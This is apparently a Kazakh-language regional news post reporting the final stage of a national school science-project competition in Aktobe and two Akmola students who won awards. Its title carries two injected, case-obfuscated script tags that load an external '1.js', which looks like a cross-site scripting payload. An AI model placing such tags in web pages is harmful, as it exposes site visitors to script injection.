Жаратылыстану-математикалық бағыттағы пәндер бойынша республикалық ғылыми жобалар байқауының қорытынды кезеңін өткізу туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2025

2025 жылғы 18-21 ақпан аралығында Ақтөбе қаласында 8-11 сынып оқушылары арасында жаратылыстану-математикалық бағыттағы пәндер бойынша республикалық ғылыми жобалар конкурсының қорытынды кезеңі өтті.

         Ғылыми байқаудың мақсаты-оқушылардың ғылыми-зерттеу және оқу-танымдық қызметін ынталандыру, неғұрлым талантты және дарынды жас зерттеушілерді іріктеу және қолдау, Қазақстан Республикасының зияткерлік әлеуетін қалыптастыруға жәрдемдесу.

Ғылыми жобаларды қорғау үш бағыт, оның ішінде 10 секция бойынша жүзеге асырылады:

«Ғылыми-техникалық прогресс экономикалық өсудің негізгі буыны ретінде», секциялар: физика, техника, Жер және Ғарыш туралы ғылым;

«Экономикалық және әлеуметтік үрдістерді математикалық модельдеу», секциялар: математика, қолданбалы математика, информатика, экономика;

«Салауатты табиғи орта – «Қазақстан-2030» Стратегиясын жүзеге асырудың негізі», секциялар: биология, химия, қоршаған ортаны және адам денсаулығын қорғау.

Ақмола облысынан  10 жобамен 10 оқушы қатысты.

Байқаудың қорытындысы бойынша ІІ-дәрежелі дипломмен – 1 оқушы, грамотамен – 1 оқушы жүлдегер атанды.

II-дәрежелі дипломмен «Биология» секциясы бойынша Маратбекова Камила – Сандықтау ауданы, Новоникольск ауылының жалпы орта білім беретін мектебінің 10-сынып оқушысы марапатталды.

         Грамотамен «Қоршаған ортаны қорғау» секциясы бойынша Базарқұл Мадияна - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 9-сынып оқушысы марапатталды.

Жаратылыстану-математикалық бағыттағы пәндер бойынша республикалық ғылыми жобалар байқауының жеңімпаздары мен жүлдегерлерін шын жүректен құттықтаймыз!!!

Просмотров: 551


Пікір қосу



Деректерді қолтаңбаға қосу